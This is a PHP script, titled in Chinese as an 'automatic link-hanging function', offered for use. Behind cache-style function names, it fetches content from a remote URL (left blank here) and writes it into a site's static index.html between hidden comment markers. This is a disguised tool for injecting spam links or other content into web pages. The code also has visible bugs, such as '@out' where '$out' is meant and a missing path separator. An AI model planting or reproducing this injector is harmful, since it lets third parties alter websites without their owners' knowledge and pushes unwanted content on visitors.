PHP 自动挂链函数。
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<?php function cacheExecute(){ //在此设置网站静态首页的文件名,默认为:"index.html" $IndexFileName = dirname(__FILE__) . "index.html"; $TempFileName = ""; $TempName = dirname(__FILE__) . "/" . $TempFileName; //在此设置网站静态首页的编码方式,默认为:"gb2312",请正确设置不然会导致乱码 $IndexFileEncoding = "UTF-8"; if(!file_exists($IndexFileName)){ echo "no_index_file"; } else{ $out = cache_output(); if(@out!=""){ $html = file_get_contents($IndexFileName); $tmp = split('<!--cache code start', $html); $tmp = split('<!--cache code end-->', $tmp[1]); $str = "<!--cache code start$tmp[0]<!--cache code end-->"; if($str != $out){ $html = str_replace($str, $out, $html); cache_file_put_contents($IndexFileName, $html); } echo "cache"; if($TempFileName!=""){ if(file_exists($TempName)){ $html = file_get_contents($TempName); $tmp = split('<!--cache code start', $html); $tmp = split('<!--cache code end-->', $tmp[1]); $str = "<!--cache code start$tmp[0]<!--cache code end-->"; if($str != $out){ $html = str_replace($str, $out, $html); cache_file_put_contents($TempName, $html); } } } } else{ echo "no_data"; } } } function cache_file_put_contents($filename, $data){ if (!function_exists('file_put_contents')) { $f = @fopen($filename, 'w'); if (!$f) { return false; } else { $bytes = fwrite($f, $data); fclose($f); return $bytes; } } else{ return file_put_contents($filename, $data); } } function cache_ad_helper($url) { $content = ''; $done=false; if (ini_get('allow_url_fopen') == '1') { if ($fp = @fopen($url, 'r')) { while ($line = @fread($fp, 1024)) { $content .= $line; $done=true; } } } if (!$done) { // get the host name and url path $parsedUrl = parse_url($url); $host = $parsedUrl['host']; if (isset($parsedUrl['path'])) { $path = $parsedUrl['path']; } $timeout = 10; // connect to the remote server $fp = @fsockopen($host, '80', $errno, $errstr, $timeout ); if( !$fp ) { // echo "Cannot retrieve $url"; } else { // send the necessary headers to get the file @fputs($fp, "GET $path HTTP/1.0\r\n" . "Host: $host\r\n\r\n"); // retrieve the response from the remote server while ( $line = @fread( $fp, 4096 ) ) { $content .= $line; } @fclose( $fp ); // strip the headers $pos = strpos($content, "\r\n\r\n"); $content = substr($content, $pos + 4); } } $content=str_replace("Bad Request (Invalid Hostname)","",$content); $content=str_replace("Service Unavailable","",$content); if (!preg_match('/\<Error/',$content)) { return $content; } // return the file content return $content; } function cache_output(){ $url = ""; return urldecode(cache_ad_helper($url));//如果出现乱码,请换成这个:return iconv("UTF-8",$IndexFileEncoding,urldecode(cache_ad_helper($url))); } cacheExecute(); ?>